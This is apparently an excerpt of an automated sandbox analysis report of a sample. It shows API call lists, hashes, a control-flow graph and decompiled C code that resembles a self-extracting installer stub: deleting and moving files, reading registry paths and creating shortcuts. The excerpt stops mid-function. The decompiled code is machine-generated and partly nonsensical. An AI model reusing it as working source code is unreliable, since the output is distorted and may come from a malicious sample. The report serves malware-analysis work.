                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<@,?,00000000,?,00000800), ref: 003E0C72
                • GetFileAttributesW.KERNELBASE(?,?,|<@,00000800,?,00000000,?,00000800), ref: 003E0C9C
                • GetFileAttributesW.KERNEL32(?,?,D=@,00000800), ref: 003E0CD8
                  • Part of subcall function 003E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003E0836
                  • Part of subcall function 003E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003DF2D8,Crypt32.dll,00000000,003DF35C,?,?,003DF33E,?,?,?), ref: 003E0858
                • _swprintf.LIBCMT ref: 003E0D4A
                • _swprintf.LIBCMT ref: 003E0D96
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                • AllocConsole.KERNEL32 ref: 003E0D9E
                • GetCurrentProcessId.KERNEL32 ref: 003E0DA8
                • AttachConsole.KERNEL32(00000000), ref: 003E0DAF
                • _wcslen.LIBCMT ref: 003E0DC4
                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 003E0DD5
                • WriteConsoleW.KERNEL32(00000000), ref: 003E0DDC
                • Sleep.KERNEL32(00002710), ref: 003E0DE7
                • FreeConsole.KERNEL32 ref: 003E0DED
                • ExitProcess.KERNEL32 ref: 003E0DF5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                • String ID: (=@$,<@$,@@$0?@$0A@$4B@$8>@$D=@$DXGIDebug.dll$H?@$H@@$HA@$P>@$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=@$`@@$d?@$dA@$dwmapi.dll$h=@$h>@$kernel32$uxtheme.dll$|<@$|?@$|@@$<@$>@$?@$@@$A@
                • API String ID: 1207345701-3700324932
                • Opcode ID: a6dcdc8dc7f4e88b5131a82beddc9669303504adb806cc071c3f9fc2a6eef241
                • Instruction ID: e96de447d9d08220a10468f8fe695d788eec7b386c0b5edce51195efd3f84d44
                • Opcode Fuzzy Hash: a6dcdc8dc7f4e88b5131a82beddc9669303504adb806cc071c3f9fc2a6eef241
                • Instruction Fuzzy Hash: 51D187B10083959BD3219F51C948B9FBFECAF85705F50892EF285BA1D0C7B88649CB5A
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 347 3ec73f-3ec757 call 3eeb78 call 3eec50 352 3ed40d-3ed418 347->352 353 3ec75d-3ec787 call 3eb314 347->353 353->352 356 3ec78d-3ec792 353->356 357 3ec793-3ec7a1 356->357 358 3ec7a2-3ec7b7 call 3eaf98 357->358 361 3ec7b9 358->361 362 3ec7bb-3ec7d0 call 3e1fbb 361->362 365 3ec7dd-3ec7e0 362->365 366 3ec7d2-3ec7d6 362->366 368 3ed3d9-3ed404 call 3eb314 365->368 369 3ec7e6 365->369 366->362 367 3ec7d8 366->367 367->368 368->357 381 3ed40a-3ed40c 368->381 371 3ec9be-3ec9c0 369->371 372 3eca5f-3eca61 369->372 373 3eca7c-3eca7e 369->373 374 3ec7ed-3ec7f0 369->374 371->368 377 3ec9c6-3ec9d2 371->377 372->368 379 3eca67-3eca77 SetWindowTextW 372->379 373->368 375 3eca84-3eca8b 373->375 374->368 378 3ec7f6-3ec850 call 3ea64d call 3dbdf3 call 3da544 call 3da67e call 3d6edb 374->378 375->368 380 3eca91-3ecaaa 375->380 382 3ec9e6-3ec9eb 377->382 383 3ec9d4-3ec9e5 call 3f7686 377->383 438 3ec98f-3ec9a4 call 3da5d1 378->438 379->368 385 3ecaac 380->385 386 3ecab2-3ecac0 call 3f3e13 380->386 381->352 389 3ec9ed-3ec9f3 382->389 390 3ec9f5-3eca00 call 3eb48e 382->390 383->382 385->386 386->368 402 3ecac6-3ecacf 386->402 394 3eca05-3eca07 389->394 390->394 399 3eca09-3eca10 call 3f3e13 394->399 400 3eca12-3eca32 call 3f3e13 call 3f3e3e 394->400 399->400 421 3eca4b-3eca4d 400->421 422 3eca34-3eca3b 400->422 406 3ecaf8-3ecafb 402->406 407 3ecad1-3ecad5 402->407 412 3ecb01-3ecb04 406->412 414 3ecbe0-3ecbee call 3e0602 406->414 411 3ecad7-3ecadf 407->411 407->412 411->368 417 3ecae5-3ecaf3 call 3e0602 411->417 419 3ecb06-3ecb0b 412->419 420 3ecb11-3ecb2c 412->420 430 3ecbf0-3ecc04 call 3f279b 414->430 417->430 419->414 419->420 433 3ecb2e-3ecb68 420->433 434 3ecb76-3ecb7d 420->434 421->368 429 3eca53-3eca5a call 3f3e2e 421->429 427 3eca3d-3eca3f 422->427 428 3eca42-3eca4a call 3f7686 422->428 427->428 428->421 429->368 448 3ecc06-3ecc0a 430->448 449 3ecc11-3ecc62 call 3e0602 call 3eb1be GetDlgItem SetWindowTextW SendMessageW call 3f3e49 430->449 469 
3ecb6c-3ecb6e 433->469 470 3ecb6a 433->470 440 3ecb7f-3ecb97 call 3f3e13 434->440 441 3ecbab-3ecbce call 3f3e13 * 2 434->441 455 3ec9aa-3ec9b9 call 3da55a 438->455 456 3ec855-3ec869 SetFileAttributesW 438->456 440->441 463 3ecb99-3ecba6 call 3e05da 440->463 441->430 475 3ecbd0-3ecbde call 3e05da 441->475 448->449 454 3ecc0c-3ecc0e 448->454 481 3ecc67-3ecc6b 449->481 454->449 455->368 458 3ec90f-3ec91f GetFileAttributesW 456->458 459 3ec86f-3ec8a2 call 3db991 call 3db690 call 3f3e13 456->459 458->438 467 3ec921-3ec930 DeleteFileW 458->467 490 3ec8a4-3ec8b3 call 3f3e13 459->490 491 3ec8b5-3ec8c3 call 3dbdb4 459->491 463->441 467->438 474 3ec932-3ec935 467->474 469->434 470->469 478 3ec939-3ec965 call 3d4092 GetFileAttributesW 474->478 475->430 488 3ec937-3ec938 478->488 489 3ec967-3ec97d MoveFileW 478->489 481->368 485 3ecc71-3ecc85 SendMessageW 481->485 485->368 488->478 489->438 492 3ec97f-3ec989 MoveFileExW 489->492 490->491 497 3ec8c9-3ec908 call 3f3e13 call 3efff0 490->497 491->455 491->497 492->438 497->458
                C-Code - Quality: 58%
                			E003EC73F(void* __edx, void* __edi) {
                				intOrPtr _t232;
                				void* _t237;
                				intOrPtr _t293;
                				intOrPtr _t297;
                				long _t308;
                				void* _t311;
                				signed int _t312;
                				void* _t316;
                
                				E003EEB78(0x402b20, _t316);
                				_t232 = E003EEC50(0x1b888);
                				if( *((intOrPtr*)(_t316 + 0xc)) == 0) {
                					L180:
                					 *[fs:0x0] =  *((intOrPtr*)(_t316 - 0xc));
                					return _t232;
                				}
                				_push(0x1000);
                				_push(_t316 - 0x15);
                				_push(_t316 - 0xd);
                				_push(_t316 - 0x588c);
                				_push(_t316 - 0xf894);
                				_push( *((intOrPtr*)(_t316 + 0xc)));
                				_t232 = E003EB314(__edi, _t316);
                				_t297 = _t232;
                				 *((intOrPtr*)(_t316 + 0xc)) = _t297;
                				if(_t297 != 0) {
                					_t293 =  *((intOrPtr*)(_t316 + 0x10));
                					_push(__edi);
                					do {
                						_t237 = _t316 - 0x588c;
                						_t311 = _t316 - 0x1b894;
                						_t308 = 6;
                						goto L4;
                						L6:
                						while(E003E1FBB(_t316 - 0xf894,  *((intOrPtr*)(0x40e744 + _t312 * 4))) != 0) {
                							_t312 = _t312 + 1;
                							if(_t312 < 0xe) {
                								continue;
                							} else {
                								goto L178;
                							}
                						}
                						if(_t312 > 0xd) {
                							goto L178;
                						}
                						switch( *((intOrPtr*)(_t312 * 4 +  &M003ED41B))) {
                							case 0:
                								__eflags = _t293 - 2;
                								if(_t293 == 2) {
                									_t308 = 0x800;
                									E003EA64D(_t316 - 0x788c, 0x800);
                									E003DA544(E003DBDF3(__eflags, _t316 - 0x788c, _t316 - 0x588c, _t316 - 0xd894, 0x800), _t293, _t316 - 0x8894, _t312);
                									 *(_t316 - 4) = 0;
                									E003DA67E(_t316 - 0x8894, _t316 - 0xd894);
                									E003D6EDB(_t316 - 0x388c);
                									while(1) {
                										_push(0);
                										_t255 = E003DA5D1(_t316 - 0x8894, _t316 - 0x388c);
                										__eflags = _t255;
                										if(_t255 == 0) {
                											break;
                										}
                										SetFileAttributesW(_t316 - 0x388c, 0);
                										__eflags =  *(_t316 - 0x2880);
                										if(__eflags == 0) {
                											L18:
                											_t259 = GetFileAttributesW(_t316 - 0x388c);
                											__eflags = _t259 - 0xffffffff;
                											if(_t259 == 0xffffffff) {
                												continue;
                											}
                											_t261 = DeleteFileW(_t316 - 0x388c);
                											__eflags = _t261;
                											if(_t261 != 0) {
                												continue;
                											} else {
                												_t314 = 0;
                												_push(0);
                												goto L22;
                												L22:
                												E003D4092(_t316 - 0x1044, _t308, L"%s.%d.tmp", _t316 - 0x388c);
                												_t318 = _t318 + 0x14;
                												_t266 = GetFileAttributesW(_t316 - 0x1044);
                												__eflags = _t266 - 0xffffffff;
                												if(_t266 != 0xffffffff) {
                													_t314 = _t314 + 1;
                													__eflags = _t314;
                													_push(_t314);
                													goto L22;
                												} else {
                													_t269 = MoveFileW(_t316 - 0x388c, _t316 - 0x1044);
                													__eflags = _t269;
                													if(_t269 != 0) {
                														MoveFileExW(_t316 - 0x1044, 0, 4);
                													}
                													continue;
                												}
                											}
                										}
                										E003DB991(__eflags, _t316 - 0x788c, _t316 - 0x1044, _t308);
                										E003DB690(__eflags, _t316 - 0x1044, _t308);
                										_t315 = E003F3E13(_t316 - 0x788c);
                										__eflags = _t315 - 4;
                										if(_t315 < 4) {
                											L16:
                											_t280 = E003DBDB4(_t316 - 0x588c);
                											__eflags = _t280;
                											if(_t280 != 0) {
                												break;
                											}
                											L17:
                											_t283 = E003F3E13(_t316 - 0x388c);
                											__eflags = 0;
                											 *((short*)(_t316 + _t283 * 2 - 0x388a)) = 0;
                											E003EFFF0(_t308, _t316 - 0x44, 0, 0x1e);
                											_t318 = _t318 + 0x10;
                											 *((intOrPtr*)(_t316 - 0x40)) = 3;
                											_push(0x14);
                											_pop(_t286);
                											 *((short*)(_t316 - 0x34)) = _t286;
                											 *((intOrPtr*)(_t316 - 0x3c)) = _t316 - 0x388c;
                											_push(_t316 - 0x44);
                											 *0x43307c();
                											goto L18;
                										}
                										_t291 = E003F3E13(_t316 - 0x1044);
                										__eflags = _t315 - _t291;
                										if(_t315 > _t291) {
                											goto L17;
                										}
                										goto L16;
                									}
                									 *(_t316 - 4) =  *(_t316 - 4) | 0xffffffff;
                									E003DA55A(_t316 - 0x8894);
                								}
                								goto L178;
                							case 1:
                								__eflags = __ebx;
                								if(__ebx == 0) {
                									__eax = E003F3E13(__esi);
                									__eax = __eax + __edi;
                									_push(__eax);
                									_push( *0x42fc94);
                									__eax = E003F3E3E(__ecx, __edx);
                									__esp = __esp + 0xc;
                									__eflags = __eax;
                									if(__eax != 0) {
                										__eax = E003F7686(__eax, __esi);
                										_pop(__ecx);
                										_pop(__ecx);
                									}
                									__eflags = __bh;
                									if(__bh == 0) {
                										__eax = L003F3E2E(__esi);
                									}
                								}
                								goto L178;
                							case 2:
                								__eflags = __ebx;
                								if(__ebx == 0) {
                									__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
                								}
                								goto L178;
                							case 3:
                								__eflags = __ebx;
                								if(__ebx != 0) {
                									goto L178;
                								}
                								__eflags =  *0x41a472 - __di;
                								if( *0x41a472 != __di) {
                									goto L178;
                								}
                								__eax = 0;
                								__edi = __ebp - 0x588c;
                								_push(0x22);
                								 *(__ebp - 0x1044) = __ax;
                								_pop(__eax);
                								__eflags =  *(__ebp - 0x588c) - __ax;
                								if( *(__ebp - 0x588c) == __ax) {
                									__edi = __ebp - 0x588a;
                								}
                								__eax = E003F3E13(__edi);
                								__esi = 0x800;
                								__eflags = __eax - 0x800;
                								if(__eax >= 0x800) {
                									goto L178;
                								} else {
                									__eax =  *__edi & 0x0000ffff;
                									_push(0x5c);
                									_pop(__ecx);
                									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
                									if(( *__edi & 0x0000ffff) != 0x2e) {
                										__eflags = __ax - __cx;
                										if(__ax == __cx) {
                											L64:
                											__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, __esi);
                											__ebx = 0;
                											__eflags = 0;
                											L65:
                											_push(0x22);
                											_pop(__eax);
                											__eax = __ebp - 0x1044;
                											__eax = E003F279B(__ebp - 0x1044, __ebp - 0x1044);
                											_pop(__ecx);
                											_pop(__ecx);
                											__eflags = __eax;
                											if(__eax != 0) {
                												__eflags =  *(__eax + 2) - __bx;
                												if( *(__eax + 2) == __bx) {
                													__ecx = 0;
                													__eflags = 0;
                													 *__eax = __cx;
                												}
                											}
                											__eax = __ebp - 0x1044;
                											__edi = 0x41a472;
                											E003E0602(0x41a472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
                											__eax = E003EB1BE(__ebp - 0x1044, __esi);
                											__esi = GetDlgItem( *(__ebp + 8), 0x66);
                											__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
                											__eax = SendMessageW(__esi, 0x143, __ebx, 0x41a472); // executed
                											__eax = __ebp - 0x1044;
                											__eax = E003F3E49(__ebp - 0x1044, 0x41a472, __eax);
                											_pop(__ecx);
                											_pop(__ecx);
                											__eflags = __eax;
                											if(__eax != 0) {
                												__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
                											}
                											goto L178;
                										}
                										L53:
                										__eflags = __ax;
                										if(__ax == 0) {
                											L55:
                											__eax = __ebp - 0x1c;
                											__ebx = 0;
                											_push(__ebp - 0x1c);
                											_push(1);
                											_push(0);
                											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
                											_push(0x80000002);
                											__eax =  *0x433028();
                											__eflags = __eax;
                											if(__eax == 0) {
                												__eax = __ebp - 0x14;
                												 *(__ebp - 0x14) = 0x1000;
                												_push(__ebp - 0x14);
                												__eax = __ebp - 0x1044;
                												_push(__ebp - 0x1044);
                												__eax = __ebp - 0x24;
                												_push(__ebp - 0x24);
                												_push(0);
                												_push(L"ProgramFilesDir");
                												_push( *(__ebp - 0x1c));
                												__eax =  *0x433024();
                												_push( *(__ebp - 0x1c));
                												 *0x433008() =  *(__ebp - 0x14);
                												__ecx = 0x7ff;
                												__eax =  *(__ebp - 0x14) >> 1;
                												__eflags = __eax - 0x7ff;
                												if(__eax >= 0x7ff) {
                													__eax = 0x7ff;
                												}
                												__ecx = 0;
                												__eflags = 0;
                												 *(__ebp + __eax * 2 - 0x1044) = __cx;
                											}
                											__eflags =  *(__ebp - 0x1044) - __bx;
                											if( *(__ebp - 0x1044) != __bx) {
                												__eax = __ebp - 0x1044;
                												__eax = E003F3E13(__ebp - 0x1044);
                												_push(0x5c);
                												_pop(__ecx);
                												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
                												if(__eflags != 0) {
                													__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, "\\", __esi);
                												}
                											}
                											__esi = E003F3E13(__edi);
                											__eax = __ebp - 0x1044;
                											__eflags = __esi - 0x7ff;
                											__esi = 0x800;
                											if(__eflags < 0) {
                												__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, __edi, 0x800);
                											}
                											goto L65;
                										}
                										__eflags =  *((short*)(__edi + 2)) - 0x3a;
                										if( *((short*)(__edi + 2)) == 0x3a) {
                											goto L64;
                										}
                										goto L55;
                									}
                									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
                									if( *((intOrPtr*)(__edi + 2)) != __cx) {
                										goto L53;
                									}
                									__edi = __edi + 4;
                									__ebx = 0;
                									__eflags =  *__edi - __bx;
                									if( *__edi == __bx) {
                										goto L178;
                									} else {
                										__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, 0x800);
                										goto L65;
                									}
                								}
                							case 4:
                								__eflags =  *0x41a46c - 1;
                								__eflags = __eax - 0x41a46c;
                								 *__edi =  *__edi + __ecx;
                								__eflags =  *(__edx + 7) & __al;
                								 *__eax =  *__eax + __al;
                								__eflags =  *__eax;
                							case 5:
                								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                								__ecx = 0;
                								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                								__eflags = __eax;
                								if(__eax == 0) {
                									L82:
                									 *0x418457 = __cl;
                									 *0x418460 = 1;
                									goto L178;
                								}
                								__eax = __eax - 0x30;
                								__eflags = __eax;
                								if(__eax == 0) {
                									 *0x418457 = __cl;
                									L81:
                									 *0x418460 = __cl;
                									goto L178;
                								}
                								__eax = __eax - 1;
                								__eflags = __eax;
                								if(__eax == 0) {
                									goto L82;
                								}
                								__eax = __eax - 1;
                								__eflags = __eax;
                								if(__eax != 0) {
                									goto L178;
                								}
                								 *0x418457 = 1;
                								goto L81;
                							case 6:
                								__edi = 0;
                								 *0x41c577 = 1;
                								__edi = 1;
                								__eax = __ebp - 0x588c;
                								__eflags =  *(__ebp - 0x588c) - 0x3c;
                								__ebx = __esi;
                								 *(__ebp - 0x14) = __eax;
                								if( *(__ebp - 0x588c) != 0x3c) {
                									L99:
                									__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
                									if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
                										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
                										if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
                											goto L178;
                										}
                										__eflags = __ebx - 6;
                										if(__ebx != 6) {
                											goto L178;
                										}
                										__ecx = 0;
                										__eflags = 0;
                										_push(0);
                										L105:
                										_push(__edi);
                										_push(__eax);
                										_push( *(__ebp + 8));
                										__eax = E003ED78F(__ebp);
                										goto L178;
                									}
                									__eflags = __ebx - 9;
                									if(__ebx != 9) {
                										goto L178;
                									}
                									_push(1);
                									goto L105;
                								}
                								__eax = __ebp - 0x588a;
                								_push(0x3e);
                								_push(__ebp - 0x588a);
                								__eax = E003F22C6(__ecx);
                								_pop(__ecx);
                								_pop(__ecx);
                								__eflags = __eax;
                								if(__eax == 0) {
                									L98:
                									__eax =  *(__ebp - 0x14);
                									goto L99;
                								}
                								_t111 = __eax + 2; // 0x2
                								__ecx = _t111;
                								 *(__ebp - 0x14) = _t111;
                								__ecx = 0;
                								 *__eax = __cx;
                								__eax = __ebp - 0x10c;
                								_push(0x64);
                								_push(__ebp - 0x10c);
                								__eax = __ebp - 0x588a;
                								_push(__ebp - 0x588a);
                								__eax = E003EAF98();
                								 *(__ebp - 0x20) = __eax;
                								__eflags = __eax;
                								if(__eax == 0) {
                									goto L98;
                								}
                								__esi = __eax;
                								while(1) {
                									__eflags =  *(__ebp - 0x10c);
                									if( *(__ebp - 0x10c) == 0) {
                										goto L98;
                									}
                									__eax = __ebp - 0x10c;
                									__eax = E003E1FBB(__ebp - 0x10c, L"HIDE");
                									__eax =  ~__eax;
                									asm("sbb eax, eax");
                									__edi = __edi & __eax;
                									__eax = __ebp - 0x10c;
                									__eax = E003E1FBB(__ebp - 0x10c, L"MAX");
                									__eflags = __eax;
                									if(__eax == 0) {
                										_push(3);
                										_pop(__edi);
                									}
                									__eax = __ebp - 0x10c;
                									__eax = E003E1FBB(__ebp - 0x10c, L"MIN");
                									__eflags = __eax;
                									if(__eax == 0) {
                										_push(6);
                										_pop(__edi);
                									}
                									_push(0x64);
                									__eax = __ebp - 0x10c;
                									_push(__ebp - 0x10c);
                									_push(__esi);
                									__esi = E003EAF98();
                									__eflags = __esi;
                									if(__esi != 0) {
                										continue;
                									} else {
                										goto L98;
                									}
                								}
                								goto L98;
                							case 7:
                								__eflags = __ebx - 1;
                								if(__eflags != 0) {
                									__eflags = __ebx - 7;
                									if(__ebx == 7) {
                										__eflags =  *0x41a46c - __edi;
                										if( *0x41a46c == __edi) {
                											 *0x41a46c = 2;
                										}
                										 *0x419468 = 1;
                									}
                									goto L178;
                								}
                								__eax = __ebp - 0x788c;
                								__edi = 0x800;
                								GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
                								__eax = E003DB690(__eflags, __ebp - 0x788c, 0x800);
                								__ebx = 0;
                								__esi = 0;
                								_push(0);
                								while(1) {
                									_push( *0x40e724);
                									__ebp - 0x788c = E003D4092(0x41946a, __edi, L"%s%s%u", __ebp - 0x788c);
                									__eax = E003DA231(0x41946a);
                									__eflags = __al;
                									if(__al == 0) {
                										break;
                									}
                									__esi =  &(__esi->i);
                									__eflags = __esi;
                									_push(__esi);
                								}
                								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x41946a);
                								__eflags =  *(__ebp - 0x588c) - __bx;
                								if( *(__ebp - 0x588c) == __bx) {
                									goto L178;
                								}
                								__eflags =  *0x41c575 - __bl;
                								if( *0x41c575 != __bl) {
                									goto L178;
                								}
                								__eax = 0;
                								 *(__ebp - 0x444) = __ax;
                								__eax = __ebp - 0x588c;
                								_push(0x2c);
                								_push(__ebp - 0x588c);
                								__eax = E003F22C6(__ecx);
                								_pop(__ecx);
                								_pop(__ecx);
                								__eflags = __eax;
                								if(__eax != 0) {
                									L122:
                									__eflags =  *(__ebp - 0x444) - __bx;
                									if( *(__ebp - 0x444) == __bx) {
                										__ebp - 0x1b894 = __ebp - 0x588c;
                										E003E0602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
                										__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x19894, 0x200);
                									}
                									__ebp - 0x588c = E003EADD2(__ebp - 0x588c);
                									__eax = 0;
                									 *(__ebp - 0x488c) = __ax;
                									__ebp - 0x444 = __ebp - 0x588c;
                									__eax = E003EA7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
                									__eflags = __eax - 6;
                									if(__eax != 6) {
                										__eax = 0;
                										 *0x418454 = 1;
                										 *0x41946a = __ax;
                										__eax = EndDialog( *(__ebp + 8), 1);
                									}
                									goto L178;
                								}
                								__ax =  *(__ebp - 0x588c);
                								__esi = __ebx;
                								__eflags = __ax;
                								if(__ax == 0) {
                									goto L122;
                								}
                								__ecx = __ax & 0x0000ffff;
                								while(1) {
                									__eflags = __cx - 0x40;
                									if(__cx == 0x40) {
                										break;
                									}
                									__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
                									__esi =  &(__esi->i);
                									__ecx = __eax;
                									__eflags = __ax;
                									if(__ax != 0) {
                										continue;
                									}
                									goto L122;
                								}
                								__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
                								__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x444, 0x200);
                								__eax = 0;
                								__eflags = 0;
                								 *(__ebp + __esi * 2 - 0x588c) = __ax;
                								goto L122;
                							case 8:
                								__eflags = __ebx - 3;
                								if(__ebx == 3) {
                									__eflags =  *(__ebp - 0x588c) - __di;
                									if(__eflags != 0) {
                										__eax = __ebp - 0x588c;
                										_push(__ebp - 0x588c);
                										__eax = E003F7625(__ebx, __edi);
                										_pop(__ecx);
                										 *0x42fc9c = __eax;
                									}
                									__eax = __ebp + 0xc;
                									_push(__ebp + 0xc);
                									 *0x42fc98 = E003EB48E(__ecx, __edx, __eflags);
                								}
                								 *0x41c576 = 1;
                								goto L178;
                							case 9:
                								__eflags = __ebx - 6;
                								if(__ebx != 6) {
                									goto L178;
                								}
                								__eax = 0;
                								 *(__ebp - 0x2844) = __ax;
                								__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
                								__eax = E003F79E9( *(__ebp - 0x1b894) & 0x0000ffff);
                								__eflags = __eax - 0x50;
                								if(__eax == 0x50) {
                									 *(__ebp - 0x14) = 2;
                									__eax = 0x42cb82;
                								} else {
                									__eflags = __eax - 0x54;
                									if(__eax == 0x54) {
                										 *(__ebp - 0x14) = 7;
                										__eax = 0x42bb82;
                									} else {
                										 *(__ebp - 0x14) = 0x10;
                										__eax = 0x42db82;
                									}
                								}
                								__esi = 0x800;
                								__ebp - 0x2844 = E003E0602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
                								__eax = 0;
                								 *(__ebp - 0x9894) = __ax;
                								 *(__ebp - 0x1844) = __ax;
                								__ebp - 0x19894 = __ebp - 0x688c;
                								__eax = E003E0602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
                								_push(0x22);
                								_pop(__ebx);
                								__eflags =  *(__ebp - 0x688c) - __bx;
                								if( *(__ebp - 0x688c) != __bx) {
                									__ebp - 0x688c = E003DA231(__ebp - 0x688c);
                									__eflags = __al;
                									if(__al != 0) {
                										goto L163;
                									}
                									__ax =  *(__ebp - 0x688c);
                									__esi = __ebp - 0x688c;
                									__ebx = __edi;
                									__eflags = __ax;
                									if(__ax == 0) {
                										__esi = 0x800;
                										goto L163;
                									}
                									__edi = __ax & 0x0000ffff;
                									do {
                										_push(0x20);
                										_pop(__eax);
                										__eflags = __di - __ax;
                										if(__di == __ax) {
                											L149:
                											__eax = 0;
                											__esi->i = __ax;
                											__ebp - 0x688c = E003DA231(__ebp - 0x688c);
                											__eflags = __al;
                											if(__al == 0) {
                												L158:
                												__esi->i = __di;
                												goto L159;
                											}
                											__ebp - 0x688c = E003DA243(__ebp - 0x688c);
                											__eax = E003DA28F(__eax);
                											__eflags = __al;
                											if(__al != 0) {
                												goto L158;
                											}
                											_push(0x2f);
                											_pop(__ecx);
                											__eax =  &(__esi->i);
                											__ebx = __esi;
                											__eflags = __di - __cx;
                											if(__di != __cx) {
                												_push(0x20);
                												__esi = __eax;
                												_pop(__eax);
                												while(1) {
                													__eflags = __esi->i - __ax;
                													if(__esi->i != __ax) {
                														break;
                													}
                													__esi =  &(__esi->i);
                													__eflags = __esi;
                												}
                												__ecx = __ebp - 0x1844;
                												__eax = __esi;
                												__edx = 0x400;
                												L157:
                												__eax = E003E0602(__ecx, __eax, __edx);
                												 *__ebx = __di;
                												goto L159;
                											}
                											 *(__ebp - 0x1844) = __cx;
                											__edx = 0x3ff;
                											__ecx = __ebp - 0x1842;
                											goto L157;
                										}
                										_push(0x2f);
                										_pop(__eax);
                										__eflags = __di - __ax;
                										if(__di != __ax) {
                											goto L159;
                										}
                										goto L149;
                										L159:
                										__esi =  &(__esi->i);
                										__eax = __esi->i & 0x0000ffff;
                										__edi = __esi->i & 0x0000ffff;
                										__eflags = __ax;
                									} while (__ax != 0);
                									__esi = 0x800;
                									__eflags = __ebx;
                									if(__ebx != 0) {
                										__eax = 0;
                										 *__ebx = __ax;
                									}
                									goto L163;
                								} else {
                									__ebp - 0x19892 = __ebp - 0x688c;
                									E003E0602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
                									_push(__ebx);
                									_push(__ebp - 0x688a);
                									__eax = E003F22C6(__ecx);
                									_pop(__ecx);
                									_pop(__ecx);
                									__eflags = __eax;
                									if(__eax != 0) {
                										__ecx = 0;
                										 *__eax = __cx;
                										__ebp - 0x1844 = E003E0602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
                									}
                									L163:
                									__eflags =  *((short*)(__ebp - 0x11894));
                									if( *((short*)(__ebp - 0x11894)) != 0) {
                										__ebp - 0x9894 = __ebp - 0x11894;
                										__eax = E003DB6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
                									}
                									__ebp - 0xb894 = __ebp - 0x688c;
                									__eax = E003DB6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
                									__eflags =  *(__ebp - 0x2844);
                									if(__eflags == 0) {
                										__ebp - 0x2844 = E003EB425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
                									}
                									__ebp - 0x2844 = E003DB690(__eflags, __ebp - 0x2844, __esi);
                									__eflags =  *((short*)(__ebp - 0x17894));
                									if(__eflags != 0) {
                										__ebp - 0x17894 = __ebp - 0x2844;
                										E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
                										__eax = E003DB690(__eflags, __ebp - 0x2844, __esi);
                									}
                									__ebp - 0x2844 = __ebp - 0xc894;
                									__eax = E003E0602(__ebp - 0xc894, __ebp - 0x2844, __esi);
                									__eflags =  *(__ebp - 0x13894);
                									__eax = __ebp - 0x13894;
                									if(__eflags == 0) {
                										__eax = __ebp - 0x19894;
                									}
                									__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
                									__eax = __ebp - 0x2844;
                									__eflags = E003DB92D(__ebp - 0x2844);
                									if(__eflags == 0) {
                										L173:
                										__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
                										goto L174;
                									} else {
                										__eflags = __eax;
                										if(__eflags == 0) {
                											L174:
                											__ebx = 0;
                											__ebp - 0x2844 = E003DA0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
                											__ebp - 0xb894 = __ebp - 0xa894;
